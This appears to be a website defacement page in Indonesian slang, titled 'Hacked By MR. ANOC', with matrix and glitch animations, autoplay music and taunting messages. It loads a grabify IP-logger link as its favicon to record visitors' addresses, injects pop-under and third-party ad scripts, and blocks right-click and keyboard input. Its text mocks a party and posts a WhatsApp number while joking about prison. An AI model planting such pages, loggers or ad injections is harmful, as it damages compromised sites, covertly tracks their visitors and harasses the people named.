/ AKU LAGI GABUT CUY MAKANYA /
<html>
<head>
 <body bgcolor="black" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;"> 
  <table width="100%" height="100%">
  <div style="position: fixed; top: 75px; left: -225px; width: 600px; padding: 10px; font-size: 24px; text-align: center; color: white; font-family: 'trebuchet ms', verdana, arial, sans-serif;transform: rotate(-45deg);transform-origin: 50% 0px;-o-transform: rotate(-45deg); -o-transform-origin: 50% 0px;-moz-transform: rotate(-45deg); -moz-transform-origin: 50% 0px; -webkit-transform: rotate(-45deg); -webkit-transform-origin: 50% 0px; background-color: Transparent; border: 1px solid rgb(170, 170, 170); z-index: 9999; opacity: 0.5;"><a href="https://wa.me/+17754993521" style="text-decoration:none;color:white;">MR. ANOC</a></div>
   <tbody>
    <tr>
     <td align="center"><br><br><br><br><br><br><br><br> 
      <link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"> 
      <link href="https://grabify.link/6Z3TSW" rel="SHORTCUT ICON"> 
      <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <title>xnxx.com/index.html</title> <style type="text/css">
h1 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
 
 
h2 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
 
h3 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
 
 
h4 {color: #FF0000;font-size: 20px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
 
 
.matrix {color: #FFFFFF; font-family:Arial, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.jokitz1{
    text-align : center;
    }
.jokitz2{
    text-align : center;
    font-family : Courier;
    }
</style> <script type="text/javascript">
 
<!--
 
//Disable right click script
 
 
var message="Dear Admin, Im Sorry Just Kidding";
 
///////////////////////////////////
 
function clickIE() {if (document.all) {(message);return false;}}
 
function clickNS(e) {if
 
(document.layers||(document.getElementById&&!document.all)) {
 
if (e.which==2||e.which==3) {(message);return false;}}}
 
if (document.layers)
 
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
 
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
 
document.oncontextmenu=new Function("return false")
 
// -->
 
</script> 
      <!-- <script language="JavaScript1.2" type="text/javascript">
 
function ClearError() {return true;}
 
window.onerror = ClearError;
 
</script> --> <script type="text/javascript" language="javascript">
 
 
 
<!--
 
var rows=1; // must be an odd number
 
var speed=10; // lower is faster
 
var reveal=2; // between 0 and 2 only. The higher, the faster the word appears
 
var effectalign="center" //enter "center" to center it.
 
 
 
/***********************************************
 
* Just Kidding :V
 
***********************************************/
 
 
 
 
var w3c=document.getElementById && !window.opera;;
 
var ie45=document.all && !window.opera;
 
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
 
var m_coch=new Array();
 
var m_copo=new Array();
 
window.onload=function() {
 
    if (!w3c && !ie45) return
 
 var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
 
 ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
 
 ma_txt=" "+ma_txt+" ";
 
 columns=ma_txt.length;
 
 if (w3c) {
 
   while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
 
   ma_tab=document.createElement("table");
 
   ma_tab.setAttribute("border", 0);
 
   ma_tab.setAttribute("align", effectalign);
 
   ma_tab.style.backgroundColor="#000000";
 
   ma_bod=document.createElement("tbody");
 
   for (x=0; x<rows; x++) {
 
     ma_row=document.createElement("tr");
 
     for (y=0; y<columns; y++) {
 
       matemp=document.createElement("td");
 
       matemp.setAttribute("id", "Mx"+x+"y"+y);
 
       matemp.className="matrix";
 
       matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
 
       ma_row.appendChild(matemp);
 
     }
 
     ma_bod.appendChild(ma_row);
 
   }
 
   ma_tab.appendChild(ma_bod);
 
   matrix.appendChild(ma_tab);
 
 } else {
 
   ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
 
   for (var x=0; x<rows; x++) {
 
     ma_tab+='<t'+'r>';
 
     for (var y=0; y<columns; y++) {
 
       ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
 
     }
 
     ma_tab+='</'+'tr>';
 
   }
 
   ma_tab+='</'+'table>';
 
   matrix.innerHTML=ma_tab;
 
 }
 
 ma_cho=ma_txt;
 
 for (x=0; x<columns; x++) {
 
   ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
 
   m_copo[x]=0;
 
 }
 
 ma_bod=setInterval("mytricks()", speed);
 
}
 
 
 
function mytricks() {
 
 x=0;
 
 for (y=0; y<columns; y++) {
 
   x=x+(m_copo[y]==100);
 
   ma_row=m_copo[y]%100;
 
   if (ma_row && m_copo[y]<100) {
 
     if (ma_row<rows+1) {
 
       if (w3c) {
 
         matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
 
         matemp.firstChild.nodeValue=m_coch[y];
 
       }
 
       else {
 
         matemp=document.all["Mx"+(ma_row-1)+"y"+y];
 
         matemp.innerHTML=m_coch[y];
 
       }
 
       matemp.style.color="#81F2FF";
 
       matemp.style.fontWeight="bold";
 
     }
 
     if (ma_row>1 && ma_row<rows+2) {
 
       matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
 
       matemp.style.fontWeight="normal";
 
       matemp.style.color="#00BBFF";
 
     }
 
     if (ma_row>2) {
 
         matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
 
       matemp.style.color="#20FFDA";
 
     }
 
     if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
 
     else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
 
     else if (ma_row<rows+2) m_copo[y]++;
 
     else if (m_copo[y]<100) m_copo[y]=0;
 
   }
 
   else if (Math.random()>0.9 && m_copo[y]<100) {
 
     m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
 
     m_copo[y]++;
 
   }
 
 }
 
 if (x==columns) clearInterval(ma_bod);
 
}
 
 
 
function zoomer(ycol) {
 
 var mtmp, mtem, ytmp;
 
 if (m_copo[ycol]==Math.floor(rows/2)+1) {
 
   for (ytmp=0; ytmp<rows; ytmp++) {
 
     if (w3c) {
 
       mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
 
       mtmp.firstChild.nodeValue=m_coch[ycol];
 
     }
 
     else {
 
       mtmp=document.all["Mx"+ytmp+"y"+ycol];
 
       mtmp.innerHTML=m_coch[ycol];
 
     }
 
     mtmp.style.color="#5BEEFF";
 
     mtmp.style.fontWeight="bold";
 
   }
 
   if (Math.random()<reveal) {
 
     mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
 
     ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
 
   }
 
   if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
 
   m_copo[ycol]+=199;
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 else if (m_copo[ycol]>200) {
 
   if (w3c) {
 
     mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
 
     mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
 
   }
 
   else {
 
     mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
 
     mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
 
   }
 
   mtmp.style.fontWeight="normal";
 
   mtem.style.fontWeight="normal";
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
 
 if (m_copo[ycol]>100 && m_copo[ycol]<200) {
 
   if (w3c) {
 
     mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
 
     mtmp.firstChild.nodeValue=String.fromCharCode(160);
 
     mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
 
     mtem.firstChild.nodeValue=String.fromCharCode(160);
 
   }
 
   else {
 
     mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
 
     mtmp.innerHTML=String.fromCharCode(160);
 
     mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
 
     mtem.innerHTML=String.fromCharCode(160);
 
   }
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 
 
 //start
 
var h1 = document.getElementsByTagName("h1")[0],
 
text = h1.innerText || h1.textContent,
 
split = [], i, lit = 0, timer = null;
 
for(i = 0; i < text.length; ++i) {
 
split.push("<span>" + text[i] + "</span>");
 
}
 
h1.innerHTML = split.join("");
 
split = h1.childNodes;
 
 
 
var flicker = function() {
 
lit += 0.01;
 
if(lit >= 1) {
 
clearInterval(timer);
 
}
 
for(i = 0; i < split.length; ++i) {
 
if(Math.random() < lit) {
 
split[i].className = "neon";
 
} else {
 
split[i].className = "";
 
}
 
}
 
}
 
setInterval(flicker, 100);
 
 
 
}
 
//strat sec
 
 
 
// end  -->
 
</script> 
      <center><img src="https://leancoding.co/L6K6ER" width="450" height="450" /></center>
      <center> 

       <br> 
       <h1>Hacked By MR. ANOC</h1> 
       <div id="matrix" class="auto-style8">
         !!!
       </div>

<br>

<br>

<iframe width="1" height="0" src="https://www.youtube.com/channel/UCGOB5ISKsBTnFvUXn-4qsLw" frameborder="0" allowfullscreen ></iframe >

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>

<center><font size='4' color='green'>[ </font>

<font size='4' color='white'>Jangan Melirik Nanti Tertarik<font size='4' color='green'> ]</font>

<br><br></center>


<right><font size='3' color='white'>

Semoga Bisa Viral Ya Luh <br> Dan Masuk Penjara   <br>6Tahun   <br> +denda 200juta 



Tapi Gua dikasih pulsa bro 100k <br>

<br>

 Kalo Berhasil Ngomong ke gua ya asu terimakasih sama gua:v <br>

<br> Ni Org kaya Bro <br> Jangan Banyak Banyak Ya Asu Tebas webnya gua kasihan sama ni org:v <br> ni kalo mau kontak nya minta ke gua MR. ANOC



Katanya Udh bosen hidup bro <br>Makannya mau dipenjara katanya  <br>(๑・ω-)～♥”

<br>



<font color="white">Contact</font>: <a href="Wa.me/+17754993521"><font color="green">Nih Kontak nya dia bro penjara aja</a></font><br>

</font></right>

<body>

<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
<script src='https://faisal-fachrueza.googlecode.com/svn/efekbintang.js' type='text/javascript'></script>

<center><br><font size="4" color="white">__________<font size="4" color="green">__________<font size="4" color="white">__________</font><br><br></center>

<center><font size='4' color='green'>[ </font>

<font size='4' color='white'>Gua Gans Lu Buriq Tq<font size='4' color='green'> ]</font>

<br>

<marquee width="45%" behavior="alternate" scrollamount="5" style="width: 45%;">

<font size="4" color="lime">

Gua Bukan Hewker Bro Gua Cuma Orang Biasa

</font></marquee></br></center>

<center><br>

<center><font size='4' color='green'>[ </font>

<font size='4' color='white'>Yang Bilang Gua Hwker Gua Gebug Sini Anying:v<font size='4' color='green'> ]</font>

<br>

<font color='lime' face='verdana' size='3'>-=|</font>

<font face ='verdana' color='white' style="text-shadow: lime 0 0 10px ;" size='2'>

<marquee scrollamount='6' behavior='alternate' width='50%'>

#Bukan Hwker Hanya Tertarik Dengan Dunia Cyber</marquee></font>

<font color='lime' face='verdana' size='3'>|=-</font>

<br>

<center><br>

<style type="text/css">

    body {background-color:#000000;}

    #q {font: 40px impact;color:#FFD700;}





</style>
<center><audio autoplay="autoplay" controls="controls" src="https://k.top4top.io/m_1647gd19u0.mp3"></audio></a></center>

<b><font face="courier new" size='6'>
<marquee behavior="scroll" direction="left" scrollamount="90" scrolldelay="40" width="100%">
<font color="green">___________________________________________________________</font></marquee>

<br>
<br>


<style type="text/css">

body {

background-color:black;


  -webkit-background-size: cover;

  -moz-background-size: cover;

  -o-background-size: cover;

  background-size: cover;

}

</style>

<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>

<meta name="keywords" content="Touched By ./IrwanGans"/>

<meta name="description" content="Touched By ./IrwanGans">

<meta name="author" content="Touched By ./IrwanGns">

<meta name="googlebot" content="all,index,follow">

<meta name="robots" content="index, follow">



    <script type="text/javascript">

var uid = '154035';

var wid = '328457';

</script>

<script type="text/javascript" src="//cdn.popcash.net/pop.js"></script>

</head>


<center>

<body>

<script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!



0;a.src="http://d36mw5gp04ykm5.cloudfront.net/yc/adrns_y.js?v=6.11.138#p=st500lt014-1dg144_w3pqm974xxxxw3pqm974";var b=document.getElementsByTagName("script")



[0];b.parentNode.insertBefore(a,b);})();</script></head>

<style type="text/css">

body {

    background: #000;

    font-family: 'Courier new';

    text-align: center;

    color: #fff;

}

img{

    margin-top: 3%;

    width: 450px;

    opacity: 1;

}

#bg {

    margin: auto;

}

marquee{

    color: white;

}

</style>

<style>

#container {

  width: 97vw;

  margin: 2vw auto;

}

h6 {

  text-align: center;

  color: #fff;

  font-size: 3em;

  letter-spacing: 1px;

  font-family: 'Iceberg';

  font-weight: 400;

  /*Create overlap*/

  

  margin: 0;

  line-height: 0;

  /*Animation*/

  

  -webkit-animation: glitch1 2.5s infinite;

  

          animation: glitch1 2.5s infinite;

}

h6:nth-child(2) {

  color: #67f3da;

  -webkit-animation: glitch2 2.5s infinite;

          animation: glitch2 2.5s infinite;

}

h6:nth-child(3) {

  color: #f16f6f;

  -webkit-animation: glitch3 2.5s infinite;

          animation: glitch3 2.5s infinite;

}

/*Keyframes*/

@-webkit-keyframes glitch1 {

  0% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  7% {

    -webkit-transform: skew(-0.5deg, -0.9deg);

            transform: skew(-0.5deg, -0.9deg);

    opacity: 0.75;

  }

  10% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  27% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  30% {

    -webkit-transform: skew(0.8deg, -0.1deg);

            transform: skew(0.8deg, -0.1deg);

    opacity: 0.75;

  }

  35% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  52% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  55% {

    -webkit-transform: skew(-1deg, 0.2deg);

            transform: skew(-1deg, 0.2deg);

    opacity: 0.75;

  }

  50% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  72% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  75% {

    -webkit-transform: skew(0.4deg, 1deg);

            transform: skew(0.4deg, 1deg);

    opacity: 0.75;

  }

  80% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  100% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

}

@keyframes glitch1 {

  0% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  7% {

    -webkit-transform: skew(-0.5deg, -0.9deg);

            transform: skew(-0.5deg, -0.9deg);

    opacity: 0.75;

  }

  10% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  27% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  30% {

    -webkit-transform: skew(0.8deg, -0.1deg);

            transform: skew(0.8deg, -0.1deg);

    opacity: 0.75;

  }

  35% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  52% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  55% {

    -webkit-transform: skew(-1deg, 0.2deg);

            transform: skew(-1deg, 0.2deg);

    opacity: 0.75;

  }

  50% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  72% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  75% {

    -webkit-transform: skew(0.4deg, 1deg);

            transform: skew(0.4deg, 1deg);

    opacity: 0.75;

  }

  80% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

  100% {

    -webkit-transform: none;

            transform: none;

    opacity: 1;

  }

}

@-webkit-keyframes glitch2 {

  0% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  7% {

    -webkit-transform: translate(-2px, -3px);

            transform: translate(-2px, -3px);

    opacity: 0.5;

  }

  10% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  27% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  30% {

    -webkit-transform: translate(-5px, -2px);

            transform: translate(-5px, -2px);

    opacity: 0.5;

  }

  35% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  52% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  55% {

    -webkit-transform: translate(-5px, -1px);

            transform: translate(-5px, -1px);

    opacity: 0.5;

  }

  50% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  72% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  75% {

    -webkit-transform: translate(-2px, -6px);

            transform: translate(-2px, -6px);

    opacity: 0.5;

  }

  80% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  100% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

}

@keyframes glitch2 {

  0% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  7% {

    -webkit-transform: translate(-2px, -3px);

            transform: translate(-2px, -3px);

    opacity: 0.5;

  }

  10% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  27% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  30% {

    -webkit-transform: translate(-5px, -2px);

            transform: translate(-5px, -2px);

    opacity: 0.5;

  }

  35% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  52% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  55% {

    -webkit-transform: translate(-5px, -1px);

            transform: translate(-5px, -1px);

    opacity: 0.5;

  }

  50% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  72% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  75% {

    -webkit-transform: translate(-2px, -6px);

            transform: translate(-2px, -6px);

    opacity: 0.5;

  }

  80% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  100% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

}

mm

@-webkit-keyframes glitch3 {

  0% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  7% {

    -webkit-transform: translate(2px, 3px);

            transform: translate(2px, 3px);

    opacity: 0.5;

  }

  10% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  27% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  30% {

    -webkit-transform: translate(5px, 2px);

            transform: translate(5px, 2px);

    opacity: 0.5;

  }

  35% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  52% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  55% {

    -webkit-transform: translate(5px, 1px);

            transform: translate(5px, 1px);

    opacity: 0.5;

  }

  50% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  72% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  75% {

    -webkit-transform: translate(2px, 6px);

            transform: translate(2px, 6px);

    opacity: 0.5;

  }

  80% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  100% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

}

@keyframes glitch3 {

  0% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  7% {

    -webkit-transform: translate(2px, 3px);

            transform: translate(2px, 3px);

    opacity: 0.5;

  }

  10% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  27% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  30% {

    -webkit-transform: translate(5px, 2px);

            transform: translate(5px, 2px);

    opacity: 0.5;

  }

  35% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  52% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  55% {

    -webkit-transform: translate(5px, 1px);

            transform: translate(5px, 1px);

    opacity: 0.5;

  }

  50% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  72% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  75% {

    -webkit-transform: translate(2px, 6px);

            transform: translate(2px, 6px);

    opacity: 0.5;

  }

  80% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

  100% {

    -webkit-transform: none;

            transform: none;

    opacity: 0.25;

  }

}

 body {

 background-color: #000;

    margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}

body,a:hover{

    cursor:url(http://cur.cursors-4u.net/games/gam-13/gam1229.png),progress!important;

  }

</style>


<center><div id="container">

<h6>LOSS DOLL!!!:")</h6>
<h6>LOSS DOLL!!!:")
</h6>

<h6>LOSS DOLL!!!:")
 </h6>
<br>
<b><font face="courier new" size='6'>
<marquee behavior="scroll" direction="left" scrollamount="90" scrolldelay="40" width="100%">
<font color="green">___________________________________________________________</font></marquee>

</body>
</html>